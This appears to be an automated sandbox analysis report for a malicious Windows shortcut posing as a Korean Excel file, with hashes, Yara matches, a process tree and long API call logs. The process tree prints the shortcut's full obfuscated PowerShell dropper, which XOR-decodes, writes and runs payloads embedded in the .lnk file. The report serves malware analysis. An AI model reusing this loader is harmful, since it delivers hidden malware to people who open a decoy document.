Summary | ZeroBOX

김명희_20240515.xlsx.lnk

Generic Malware Antivirus GIF Format Lnk Format AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6401 June 3, 2024, 1:24 p.m. June 3, 2024, 1:26 p.m.
Size 9.8KB
Type MS Windows shortcut, Has command line arguments, Icon number=0, Archive, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 0993cf18121be84f5b1511318df80f44
SHA256 21900e37d1184093e2333fe7931a8a5c217aa5fd24cfd7650bc6fadbb31f7d8a
CRC32 439A3EFE
ssdeep 192:8fxo8a5Pc3weYpzKWQGrbM8VfFHtePg4db8E:78Pg3zKKrbM8V9Ht+v
Yara
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Antivirus - Contains references to security software
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xfXjODk" C:\Users\test22\AppData\Local\Temp\김명희_20240515.xlsx.lnk

    2548
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ep bypass -command $ol = 0x00000f2e; $tl = 0x0000270b; $a='JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH0gfCBTZWxlY3QtT2JqZWN0IC1FeHBhbmRQcm9wZXJ0eSBOYW1lOyBpZigkbG5rcGF0aC5jb3VudCAtZXEgMCl7JGxua3BhdGggPSBHZXQtQ2hpbGRJdGVtICRlbnY6VEVNUFwqXCoubG5rIHwgd2hlcmUtb2JqZWN0IHskXy5sZW5ndGggLWVxICR0bH07fTskZmlsZSA9IGdjICRsbmtwYXRoIC1FbmNvZGluZyBCeXRlOyAkZmlsZVNpemUgPSAkZmlsZS5jb3VudDskaT0kb2w7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2hpbGUoJGkgLWx0ICRmaWxlU2l6ZSl7JGJYb3I9JGZpbGVbJGldOyRiUnVuPSRmaWxlWyRpKzFdOyRkd1BhdGhMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzIpOyRkd0RhdGFMZW49W2JpdGNvbnZlcnRlcl06OlRvSW50MzIoJGZpbGUsICRpKzYpOyRmaT0xMDsgICAgICAgICBmb3IoW2ludF0kcD0kaSskZmk7ICRwIC1sdCAoJGkgKyAkZmkgKyRkd1BhdGhMZW4gKyAkZHdEYXRhTGVuKTsgJHArKyl7ICRmaWxlWyRwXSA9ICRmaWxlWyRwXSAtYnhvciAkYlhvcn07W2J5dGVbXV0kcGF0aEhleCA9ICRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMSldOyRwYXRoID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0U3RyaW5nKCRmaWxlWygkaSskZmkpLi4oJGkrJGZpKyRkd1BhdGhMZW4tMildKTsgc2MgJHBhdGggKFtieXRlW11dKCRmaWxlIHwgc2VsZWN0IC1Ta2lwICgkaSskZmkrJGR3UGF0aExlbikgfCBzZWxlY3QgLVNraXBMYXN0ICgkZmlsZVNpemUtJGktJGZpLSRkd1BhdGhMZW4tJGR3RGF0YUxlbikpKSAtRW5jb2RpbmcgQnl0ZTtpZigkYlJ1bil7JiRwYXRoO30kaT0kaSskZmkrJGR3UGF0aExlbiskZHdEYXRhTGVuO30=';$bytes = [Convert]::FromBase64String($a);$res = -join ($bytes -as [char[]]);&('{0}{3}{1}{4}{2}'-f 'Inv','ke-','n','o','Expressio') $res

      2664

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Select-Object : A parameter cannot be found that matches parameter name 'SkipLa
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: st'.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:829
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq $tl} | Select-Ob
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ject -ExpandProperty Name; if($lnkpath.count -eq 0){$lnkpath = Get-ChildItem $e
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: nv:TEMP\*\*.lnk | where-object {$_.length -eq $tl};};$file = gc $lnkpath -Encod
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ing Byte; $fileSize = $file.count;$i=$ol;
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: while($i -lt $fileSize){$bXor=$file[$i];$bRun=$file[$i+1];$dwPathL
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: en=[bitconverter]::ToInt32($file, $i+2);$dwDataLen=[bitconverter]::ToInt32($fil
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: e, $i+6);$fi=10; for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dw
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: DataLen); $p++){ $file[$p] = $file[$p] -bxor $bXor};[byte[]]$pathHex = $file[($
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: i+$fi)..($i+$fi+$dwPathLen-1)];$path = [System.Text.Encoding]::ASCII.GetString(
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: $file[($i+$fi)..($i+$fi+$dwPathLen-2)]); sc $path ([byte[]]($file | select -Ski
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: p ($i+$fi+$dwPathLen) | select -SkipLast <<<< ($fileSize-$i-$fi-$dwPathLen-$dw
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: DataLen))) -Encoding Byte;if($bRun){&$path;}$i=$i+$fi+$dwPathLen+$dwDataLen;}
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidArgument: (:) [Select-Object], ParameterB
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: indingException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ands.SelectObjectCommand
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: Select-Object : A parameter cannot be found that matches parameter name 'SkipLa
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: st'.
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:829
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq $tl} | Select-Ob
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ject -ExpandProperty Name; if($lnkpath.count -eq 0){$lnkpath = Get-ChildItem $e
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: nv:TEMP\*\*.lnk | where-object {$_.length -eq $tl};};$file = gc $lnkpath -Encod
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: ing Byte; $fileSize = $file.count;$i=$ol;
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: while($i -lt $fileSize){$bXor=$file[$i];$bRun=$file[$i+1];$dwPathL
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: en=[bitconverter]::ToInt32($file, $i+2);$dwDataLen=[bitconverter]::ToInt32($fil
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: e, $i+6);$fi=10; for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dw
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: DataLen); $p++){ $file[$p] = $file[$p] -bxor $bXor};[byte[]]$pathHex = $file[($
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: i+$fi)..($i+$fi+$dwPathLen-1)];$path = [System.Text.Encoding]::ASCII.GetString(
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: $file[($i+$fi)..($i+$fi+$dwPathLen-2)]); sc $path ([byte[]]($file | select -Ski
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: p ($i+$fi+$dwPathLen) | select -SkipLast <<<< ($fileSize-$i-$fi-$dwPathLen-$dw
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: DataLen))) -Encoding Byte;if($bRun){&$path;}$i=$i+$fi+$dwPathLen+$dwDataLen;}
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidArgument: (:) [Select-Object], ParameterB
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: indingException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Comm
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ands.SelectObjectCommand
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: Select-Object : A parameter cannot be found that matches parameter name 'SkipLa
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: st'.
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: At line:1 char:829
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: + $lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq $tl} | Select-Ob
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: ject -ExpandProperty Name; if($lnkpath.count -eq 0){$lnkpath = Get-ChildItem $e
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: nv:TEMP\*\*.lnk | where-object {$_.length -eq $tl};};$file = gc $lnkpath -Encod
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: ing Byte; $fileSize = $file.count;$i=$ol;
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: while($i -lt $fileSize){$bXor=$file[$i];$bRun=$file[$i+1];$dwPathL
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: en=[bitconverter]::ToInt32($file, $i+2);$dwDataLen=[bitconverter]::ToInt32($fil
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: e, $i+6);$fi=10; for([int]$p=$i+$fi; $p -lt ($i + $fi +$dwPathLen + $dw
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: DataLen); $p++){ $file[$p] = $file[$p] -bxor $bXor};[byte[]]$pathHex = $file[($
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: i+$fi)..($i+$fi+$dwPathLen-1)];$path = [System.Text.Encoding]::ASCII.GetString(
console_handle: 0x0000019f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e858
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ec18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ec18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ec18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ec18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ec18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ec18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062e998
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0062ebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006bea90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2664
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0275a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2664
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02752000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02762000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0280a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02763000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02764000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0281b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02817000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0275b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02802000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02815000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02765000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0280c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02766000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0281c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02803000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02804000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02805000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02806000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02807000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02808000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02809000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2664
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
